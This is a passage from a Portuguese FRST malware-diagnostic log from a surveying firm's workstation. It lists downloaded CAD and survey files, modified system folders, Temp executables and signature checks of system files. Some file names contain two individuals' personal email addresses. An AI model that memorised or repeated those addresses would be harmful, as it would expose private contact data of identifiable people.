2016-06-02 10:11 - 2016-06-02 10:11 - 23610431 _____ C:\Users\Estação 01\Downloads\VITORIA ARI JANDAIA.rar
2016-06-02 10:06 - 2016-06-02 11:06 - 05711168 _____ C:\Users\Estação 01\Downloads\Levantamento Planialtimétrico (5).dwg
2016-06-02 10:06 - 2016-06-02 10:06 - 05738112 _____ C:\Users\Estação 01\Downloads\Levantamento Planialtimétrico (5).bak
2016-06-01 14:55 - 2016-06-01 14:55 - 00001533 _____ C:\Users\Estação 01\Documents\LANCAMENTO_GAP_REV2.kml
2016-06-01 14:30 - 2016-06-01 14:30 - 00000768 _____ C:\Users\Estação 01\Documents\rumo-az-rondo.txt
2016-06-01 14:29 - 2016-06-01 14:29 - 00178597 _____ C:\Users\Estação 01\Downloads\HEBER_CERTIDÃO DE MATRICULA.dwg
2016-06-01 14:28 - 2016-06-01 14:28 - 20936128 _____ C:\Users\Estação 01\Downloads\fwencminutadeservidao.zip
2016-06-01 13:43 - 2016-06-01 13:43 - 00185046 _____ C:\Users\Estação 01\Downloads\cad118.zip
2016-06-01 12:30 - 2016-06-01 12:54 - 00987424 _____ C:\Users\Estação 01\Downloads\BIOGEN - LEVANTAMENTO3.dwg
2016-06-01 12:30 - 2016-06-01 12:45 - 01012544 _____ C:\Users\Estação 01\Downloads\BIOGEN - LEVANTAMENTO3.bak
2016-06-01 12:28 - 2016-06-01 12:28 - 04956180 _____ C:\Users\Estação 01\Downloads\BIOGEN.dwg
2016-06-01 09:17 - 2016-06-01 09:18 - 05192644 _____ C:\Users\Estação 01\Downloads\Outlook.com (6).zip
2016-06-01 08:49 - 2016-06-01 08:49 - 01201535 _____ C:\Users\Estação 01\Downloads\St idustrial - rondonopolis.zip
2016-06-01 07:46 - 2016-06-01 07:46 - 00846240 _____ C:\Users\Estação 01\Downloads\fwdbiogenetapa3.zip
2016-05-31 10:23 - 2016-05-31 10:23 - 00001878 _____ C:\Users\Estação 01\Documents\PLANTA DE LIMITES E CONFRONTAÇÕES.kml
2016-05-31 10:22 - 2016-05-31 10:22 - 00253472 _____ C:\Users\Estação 01\Downloads\PLANTA DE LIMITES E CONFRONTAÇÕES.dwg
2016-05-31 09:58 - 2016-05-31 09:58 - 00000221 ____H C:\Users\Estação 01\Documents\Drawing1.dwl2
2016-05-31 09:58 - 2016-05-31 09:58 - 00000066 ____H C:\Users\Estação 01\Documents\Drawing1.dwl
2016-05-31 07:51 - 2016-06-01 11:44 - 00321536 _____ C:\Users\Estação 01\Downloads\PLANTA DE DESMEMBRAMENTO.dwg
2016-05-31 07:51 - 2016-05-31 07:51 - 00329888 _____ C:\Users\Estação 01\Downloads\PLANTA DE DESMEMBRAMENTO.bak
2016-05-30 16:29 - 2016-05-30 16:29 - 00460182 _____ C:\Users\Estação 01\Downloads\Certidão de matrícula 18202.pdf
2016-05-30 09:59 - 2016-05-30 14:30 - 00621280 _____ C:\Users\Estação 01\Downloads\CAOA-ST.BUENO-QR.65-LT.6-24.dwg
2016-05-30 09:59 - 2016-05-30 09:59 - 00597952 _____ C:\Users\Estação 01\Downloads\CAOA-ST.BUENO-QR.65-LT.6-24.bak
2016-05-30 09:16 - 2016-05-30 09:16 - 00001487 _____ C:\Users\Estação 01\Documents\RONDONOPOLIS 24-05.kml
2016-05-30 08:13 - 2016-05-30 08:13 - 01402069 _____ C:\Users\Estação 01\Downloads\tulioqa@gmail.com_24-05.rar_LIB_20160530081147.zip
2016-05-30 08:09 - 2016-05-30 08:10 - 00769363 _____ C:\Users\Estação 01\Downloads\Rondonopolis estação.rar
2016-05-25 18:35 - 2016-05-25 18:35 - 00656356 _____ C:\Users\Estação 01\Desktop\2-2.pdf
2016-05-25 18:34 - 2016-05-25 18:34 - 01031337 _____ C:\Users\Estação 01\Desktop\1-1.pdf
2016-05-25 18:11 - 2016-05-25 18:11 - 06932857 _____ C:\Users\Estação 01\Downloads\Outlook.com (5).zip
2016-05-25 17:10 - 2016-05-25 18:35 - 06058688 _____ C:\Users\Estação 01\Downloads\CHÁCARAS RIO BRANCO_ATACADÃO BALNEARIO.dwg
2016-05-25 17:10 - 2016-05-25 18:07 - 06073504 _____ C:\Users\Estação 01\Downloads\CHÁCARAS RIO BRANCO_ATACADÃO BALNEARIO.bak
2016-05-25 15:51 - 2016-05-25 15:51 - 01653763 _____ C:\Users\Estação 01\Downloads\projeto remebramento.pdf
2016-05-25 15:03 - 2016-05-25 15:03 - 03457056 _____ C:\Users\Estação 01\Downloads\LEVANTAMENTO TOPOGRÁFICO (3).dwg
2016-05-25 11:51 - 2016-05-25 13:42 - 00200928 _____ C:\Users\Estação 01\Downloads\QUADRA 192.dwg
2016-05-25 11:51 - 2016-05-25 11:51 - 00051821 _____ C:\Users\Estação 01\Downloads\QUADRA 192.bak
2016-05-24 15:46 - 2016-05-24 15:46 - 01924224 _____ C:\Users\Estação 01\Downloads\LEVANTAMENTO PLANIALTIMÉTRICO (4).dwg
2016-05-24 09:52 - 2016-05-24 09:52 - 05363392 _____ C:\Users\Estação 01\Downloads\LEV (1).dwg
2016-05-24 08:49 - 2016-05-24 08:52 - 00001285 _____ C:\Users\Estação 01\Documents\PLANALTINA-QR.192-LT28.kml
2016-05-23 16:30 - 2016-05-23 16:31 - 03524184 _____ C:\Users\Estação 01\Downloads\ÁREA ITUMBIARA.DWG
2016-05-23 14:12 - 2016-05-23 14:12 - 00544858 _____ C:\Users\Estação 01\Downloads\ANAPOLIS-VL JAIARA-QR41-LT30.zip
2016-05-23 13:35 - 2016-05-23 15:12 - 00002033 _____ C:\Users\Estação 01\Documents\FORMOSA-QR.E-LT17.kml
2016-05-23 11:22 - 2016-05-23 11:22 - 00996320 _____ C:\Users\Estação 01\Downloads\PLANTAS SÃO LOURENÇO.dwg
2016-05-20 13:18 - 2016-05-20 13:18 - 00001422 _____ C:\Users\Estação 01\Documents\TORRE - SILVANIA.kml
2016-05-20 09:42 - 2016-05-20 09:42 - 00001877 _____ C:\Users\Estação 01\Documents\ANPS-VL. JAIARA-QR41-LT3.kml
2016-05-20 08:59 - 2016-05-20 08:59 - 00031658 _____ C:\Users\Estação 01\Downloads\Chuveiro.zip
2016-05-20 08:55 - 2016-05-20 08:55 - 00000743 _____ C:\Users\Estação 01\Downloads\anapsformosaeplanaltina.zip
2016-05-19 17:10 - 2016-05-19 17:10 - 00707107 _____ C:\Users\Estação 01\Downloads\Compartilhado itens 19-5-2016 (1).zip
2016-05-19 15:53 - 2016-05-19 15:53 - 00008178 _____ C:\Users\Estação 01\Downloads\cestino_2 (1).zip
2016-05-19 10:46 - 2016-05-19 12:19 - 00644128 _____ C:\Users\Estação 01\Downloads\DESMEMBRAMENTO MOINHO DOS VENTOS.dwg
2016-05-19 10:46 - 2016-05-19 10:46 - 00657344 _____ C:\Users\Estação 01\Downloads\DESMEMBRAMENTO MOINHO DOS VENTOS.bak
2016-05-19 08:37 - 2016-05-19 08:37 - 00000809 _____ C:\Users\Estação 01\Downloads\-GECB2B.kmz
2016-05-18 16:43 - 2016-05-18 16:43 - 00113760 _____ C:\Users\Estação 01\Downloads\CRISTINA QR39 L20 GPS.dwg
2016-05-18 15:55 - 2016-05-18 15:55 - 06399989 _____ C:\Users\Estação 01\Downloads\File-1426615928.pdf
2016-05-18 15:05 - 2016-05-18 15:05 - 00001435 _____ C:\Users\Estação 01\Documents\TORRE - PE BERNARDO.kml
2016-05-18 13:54 - 2016-05-18 13:54 - 00007543 _____ C:\Users\Estação 01\Downloads\parabolica1.zip
2016-05-18 13:54 - 2016-05-18 13:54 - 00004702 _____ C:\Users\Estação 01\Downloads\parabolica2.zip
2016-05-18 08:43 - 2016-05-18 08:43 - 03357204 _____ C:\Users\Estação 01\Downloads\fwencplantabaixa.zip
2016-05-17 11:42 - 2016-05-17 11:42 - 08996923 _____ C:\Users\Estação 01\Downloads\LAGOA QUENTE-.GIESEL A FIGUEREDO.dwg
2016-05-17 11:39 - 2016-05-17 11:39 - 02116128 _____ C:\Users\Estação 01\Downloads\FAZ CONFORTO - GERAL (1).dwg
2016-05-17 10:01 - 2016-05-17 10:01 - 00003729 _____ C:\Users\Estação 01\Downloads\Es1-1000.zip
2016-05-17 07:53 - 2016-05-17 07:53 - 00833897 _____ C:\Users\Estação 01\Downloads\DWG - CTB - Código de trânsito.rar
2016-05-17 07:53 - 2016-05-17 07:53 - 00239475 _____ C:\Users\Estação 01\Downloads\Sinalizacao vertical especial de advertencia.dwg
2016-05-17 07:52 - 2016-05-17 07:52 - 00361128 _____ C:\Users\Estação 01\Downloads\Sinalizacao vertical de advertencia.dwg
2016-05-16 16:52 - 2016-05-16 16:52 - 00004257 _____ C:\Users\Estação 01\Downloads\R01.zip
2016-05-16 16:40 - 2016-05-16 16:40 - 00011299 _____ C:\Users\Estação 01\Downloads\R19.zip
2016-05-16 15:18 - 2016-05-16 15:18 - 00003469 _____ C:\Users\Estação 01\Downloads\Es1-500.zip
2016-05-16 14:29 - 2016-05-16 14:29 - 08568768 _____ C:\Users\Estação 01\Downloads\LOT.BELA VISTA ITAPURANGA-LOC.dwg
2016-05-16 14:21 - 2016-05-16 14:21 - 01621697 _____ C:\Users\Estação 01\Downloads\fwacessoaoresidencial.zip
2016-05-16 07:35 - 2016-05-16 07:35 - 00011041 _____ C:\Users\Estação 01\Downloads\kingdom loc contenção.xlsx
2016-05-16 07:34 - 2016-05-16 07:34 - 00651805 _____ C:\Users\Estação 01\Downloads\LEV.dwg
2016-05-13 13:25 - 2016-05-13 13:25 - 00593928 _____ C:\Users\Estação 01\Downloads\adrianoadriann25@gmail.com_mab5_RINEX.zip_LIB_20160513131719.zip
2016-05-13 13:00 - 2016-05-13 13:00 - 00096889 _____ C:\Users\Estação 01\Downloads\igs18876.sp3.Z
2016-05-13 09:52 - 2016-05-13 09:52 - 06369215 _____ C:\Users\Estação 01\Downloads\processar.zip
2016-05-12 16:47 - 2016-05-12 16:47 - 00154816 _____ C:\Users\Estação 01\Downloads\FAZENDA JBS.dwg
2016-05-12 13:55 - 2016-05-12 13:55 - 00991518 _____ C:\Users\Estação 01\Downloads\VILA-JD-VITÓRIA-CH.7 LO.dwg
2016-05-12 11:00 - 2016-05-12 11:00 - 00740243 _____ C:\Users\Estação 01\Downloads\VIENA P3 (1).dwg
2016-05-12 10:31 - 2016-05-12 10:31 - 00614592 _____ C:\Users\Estação 01\Downloads\MARISTA QR H18 LT 18-20.dwg
2016-05-11 10:56 - 2016-05-11 10:56 - 00002954 _____ C:\Users\Estação 01\Documents\exp SIRGAS.kml
2016-05-11 10:55 - 2016-05-11 10:55 - 00002982 _____ C:\Users\Estação 01\Documents\exp SAD69.kml
2016-05-11 10:53 - 2016-05-11 10:53 - 00005099 _____ C:\Users\Estação 01\Documents\exp.kml
2016-05-11 10:52 - 2016-05-11 10:57 - 00209056 _____ C:\Users\Estação 01\Downloads\exp.dwg
2016-05-11 10:52 - 2016-05-11 10:57 - 00208032 _____ C:\Users\Estação 01\Downloads\exp.bak
2016-05-11 08:48 - 2016-05-11 08:48 - 03511382 _____ C:\Users\Estação 01\Downloads\shoppingaparecidaarquivosqvcvaiusar.zip
2016-05-11 08:12 - 2016-05-11 08:12 - 00094048 _____ C:\Users\Estação 01\Downloads\sevilha_Q01_Lt01-27.dwg
2016-05-10 15:28 - 2016-05-10 15:29 - 09137589 _____ C:\Users\Estação 01\Downloads\setormaristaqh18lt1820.zip
2016-05-10 13:03 - 2016-05-10 13:03 - 00012475 _____ C:\Users\Estação 01\Downloads\EDUARDO MENDES LOC CONTENÇÃO.xlsx
2016-05-10 09:42 - 2016-05-10 09:42 - 00541856 _____ C:\Users\Estação 01\Downloads\SHOPPING APARECIDA - AREAS A, B E A.RESERVADA (1).dwg
2016-05-10 08:27 - 2016-05-10 08:27 - 01862150 _____ C:\Users\Estação 01\Downloads\ÁRVORES (1).dwg
2016-05-10 07:55 - 2016-05-10 07:55 - 00331104 _____ C:\Users\Estação 01\Downloads\APSH-EX-LEV-001_001D001-REM-R04.dwg
2016-05-10 07:43 - 2016-05-10 13:36 - 00852672 _____ C:\Users\Estação 01\Downloads\VIENA P3.dwg
2016-05-10 07:43 - 2016-05-10 09:35 - 00849696 _____ C:\Users\Estação 01\Downloads\VIENA P3.bak
2016-05-09 09:49 - 2016-05-09 09:49 - 02091296 _____ C:\Users\Estação 01\Downloads\FAZ CONFORTO - GERAL.dwg
2016-05-09 09:25 - 2016-05-09 09:25 - 00485317 _____ C:\Users\Estação 01\Downloads\LAUDO GARAGEM.zip

==================== Um Mês Modificados arquivos e pastas ========

(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)

2016-06-06 12:31 - 2009-07-14 00:20 - 00000000 ____D C:\Windows\inf
2016-06-06 11:50 - 2014-08-31 09:37 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk
2016-06-06 11:50 - 2014-08-31 09:37 - 00000000 ____D C:\Program Files (x86)\Autodesk
2016-06-06 11:50 - 2014-08-31 09:36 - 00000000 ____D C:\Users\Todos os Usuários\Autodesk
2016-06-06 11:50 - 2014-08-31 09:36 - 00000000 ____D C:\ProgramData\Autodesk
2016-06-06 11:48 - 2014-08-31 09:38 - 00000000 ____D C:\Program Files\Autodesk
2016-06-06 11:38 - 2009-07-14 14:55 - 00707974 _____ C:\Windows\system32\prfh0416.dat
2016-06-06 11:38 - 2009-07-14 14:55 - 00147754 _____ C:\Windows\system32\prfc0416.dat
2016-06-06 11:38 - 2009-07-14 02:13 - 01641362 _____ C:\Windows\system32\PerfStringBackup.INI
2016-06-06 09:00 - 2016-03-08 14:47 - 00005036 _____ C:\Windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for Estação01-PC-Estação 01 Estação01-PC
2016-06-06 08:41 - 2009-07-14 01:45 - 00014192 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-06-06 08:41 - 2009-07-14 01:45 - 00014192 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-06-06 08:33 - 2014-09-22 18:47 - 00000368 _____ C:\Windows\Tasks\DriverToolkit Autorun.job
2016-06-06 08:33 - 2014-08-30 17:56 - 00001066 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-06-06 08:33 - 2009-07-14 02:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-06-06 08:33 - 2009-07-14 01:45 - 00518672 _____ C:\Windows\system32\FNTCACHE.DAT
2016-06-06 08:31 - 2014-08-30 18:11 - 00144416 _____ C:\Users\Estação 01\AppData\Local\GDIPFONTCACHEV1.DAT
2016-06-06 08:22 - 2014-08-31 09:36 - 00000000 ____D C:\Users\Estação 01\AppData\Roaming\Autodesk
2016-06-06 08:20 - 2014-08-31 12:47 - 00000000 ____D C:\Users\Public\Documents\Autodesk
2016-06-06 08:20 - 2014-08-31 12:47 - 00000000 ____D C:\Program Files\Common Files\Autodesk Shared
2016-06-06 08:20 - 2014-08-31 09:39 - 00000000 ____D C:\Users\Estação 01\AppData\Local\Autodesk
2016-06-06 08:13 - 2009-07-14 02:32 - 00000000 ____D C:\Windows\Downloaded Program Files
2016-06-06 08:03 - 2016-02-29 07:49 - 00000000 ____D C:\Users\Estação 01\AppData\LocalLow\uTorrent
2016-06-06 08:03 - 2016-02-29 07:48 - 00000000 ____D C:\Users\Estação 01\AppData\Roaming\uTorrent
2016-06-06 08:03 - 2014-08-30 18:11 - 00000000 ____D C:\Users\Todos os Usuários\Package Cache
2016-06-06 08:03 - 2014-08-30 18:11 - 00000000 ____D C:\ProgramData\Package Cache
2016-06-03 14:41 - 2016-01-05 14:23 - 00000000 ____D C:\Users\Estação 01\AppData\LocalLow\Temp
2016-06-03 12:07 - 2015-06-22 14:47 - 00013245 _____ C:\Windows\BRRBCOM.INI
2016-06-03 09:35 - 2014-09-18 11:11 - 00000000 ____D C:\Users\Estação 01\TopconTools
2016-06-03 07:27 - 2014-09-16 11:05 - 00004182 _____ C:\Windows\System32\Tasks\avast! Emergency Update
2016-06-02 13:46 - 2014-10-23 08:50 - 00000000 ____D C:\AdwCleaner
2016-06-02 10:35 - 2016-01-04 13:36 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-06-02 09:55 - 2015-06-09 10:24 - 00000198 _____ C:\Windows\hcomw32.ini
2016-06-02 09:55 - 2015-06-09 10:23 - 00000000 ____D C:\Os Meus Projectos
2016-05-30 08:15 - 2015-06-09 11:15 - 00000448 _____ C:\Windows\dload32.INI
2016-05-30 08:15 - 2015-06-09 11:15 - 00000061 _____ C:\Windows\COMWRK32.INI
2016-05-20 13:24 - 2014-11-03 09:23 - 00015648 _____ C:\Windows\LGO.Tool.OT3.INI
2016-05-20 13:24 - 2014-09-29 13:48 - 00000230 _____ C:\Windows\LGO.Tool.INI
2016-05-20 13:24 - 2014-09-29 13:47 - 00000540 _____ C:\Windows\LeicaOdbProfile.Ini
2016-05-19 14:22 - 2014-09-22 17:17 - 00000000 ____D C:\Program Files (x86)\TeamViewer
2016-05-16 12:42 - 2014-08-30 20:54 - 00000000 ____D C:\Users\Estação 01\AppData\Local\ElevatedDiagnostics
2016-05-13 07:40 - 2014-08-30 17:56 - 00002193 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-05-13 07:40 - 2014-08-30 17:56 - 00002181 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-05-12 11:21 - 2016-01-04 13:37 - 00003886 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2016-05-11 07:54 - 2014-08-30 17:56 - 00004066 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-05-11 07:54 - 2014-08-30 17:56 - 00003814 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2016-05-11 07:54 - 2014-08-30 17:56 - 00001070 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-05-10 15:05 - 2016-05-06 07:51 - 00000000 ____D C:\Users\Estação 01\Desktop\ST_OESTE_RUA_05
2016-05-10 07:40 - 2009-07-14 02:08 - 00032608 _____ C:\Windows\Tasks\SCHEDLGU.TXT

==================== Arquivos na raiz de alguns diretórios =======

2016-01-22 12:40 - 2016-01-22 12:40 - 0067641 _____ () C:\Program Files\QD34LT07.GSI
2016-01-27 16:45 - 2016-01-27 16:45 - 0000000 _____ () C:\Users\Estação 01\AppData\Local\{E7131826-9014-4AE4-833F-145847C9E2B3}
2014-09-01 16:55 - 2014-09-01 16:55 - 0000057 _____ () C:\ProgramData\Ament.ini
2014-10-23 09:50 - 2014-10-23 09:50 - 0000020 _____ () C:\ProgramData\bc.ini
2014-08-31 09:39 - 2014-08-31 09:39 - 0000153 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.351.32.bc

Alguns arquivos em TEMP:
====================
C:\Users\Estação 01\AppData\Local\Temp\AcDeltree.exe
C:\Users\Estação 01\AppData\Local\Temp\Acrodist.exe
C:\Users\Estação 01\AppData\Local\Temp\Autodesk.Map.IM.WaterAnalysis.dll
C:\Users\Estação 01\AppData\Local\Temp\avgnt.exe
C:\Users\Estação 01\AppData\Local\Temp\cdo1624221574.dll
C:\Users\Estação 01\AppData\Local\Temp\cdo181587213.dll
C:\Users\Estação 01\AppData\Local\Temp\cdo2060416608.dll
C:\Users\Estação 01\AppData\Local\Temp\cdo2422226497.dll
C:\Users\Estação 01\AppData\Local\Temp\cdo2856941971.dll
C:\Users\Estação 01\AppData\Local\Temp\cdo3466077698.dll
C:\Users\Estação 01\AppData\Local\Temp\cdo912065195.dll
C:\Users\Estação 01\AppData\Local\Temp\converter.exe
C:\Users\Estação 01\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmp38cr2l.dll
C:\Users\Estação 01\AppData\Local\Temp\MouseKeyboardCenterx64_1046.exe
C:\Users\Estação 01\AppData\Local\Temp\ochelper.exe
C:\Users\Estação 01\AppData\Local\Temp\Quarantine.exe
C:\Users\Estação 01\AppData\Local\Temp\SkypeSetup.exe
C:\Users\Estação 01\AppData\Local\Temp\sqlite3.dll
C:\Users\Estação 01\AppData\Local\Temp\_is820A.exe


==================== Bamital & volsnap =================

(Não há correção automática para arquivos que não passaram na verificação.)

C:\Windows\system32\winlogon.exe => O arquivo é assinado digitalmente
C:\Windows\system32\wininit.exe => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\wininit.exe => O arquivo é assinado digitalmente
C:\Windows\explorer.exe => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\explorer.exe => O arquivo é assinado digitalmente
C:\Windows\system32\svchost.exe => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\svchost.exe => O arquivo é assinado digitalmente
C:\Windows\system32\services.exe => O arquivo é assinado digitalmente
C:\Windows\system32\User32.dll => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\User32.dll => O arquivo é assinado digitalmente
C:\Windows\system32\userinit.exe => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\userinit.exe => O arquivo é assinado digitalmente
C:\Windows\system32\rpcss.dll => O arquivo é assinado digitalmente
C:\Windows\system32\dnsapi.dll => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\dnsapi.dll => O arquivo é assinado digitalmente
C:\Windows\system32\Drivers\volsnap.sys => O arquivo é assinado digitalmente


LastRegBack: 2016-05-30 12:27

==================== Fim de FRST.txt ============================

Publicité


Signaler le contenu de ce document

Publicité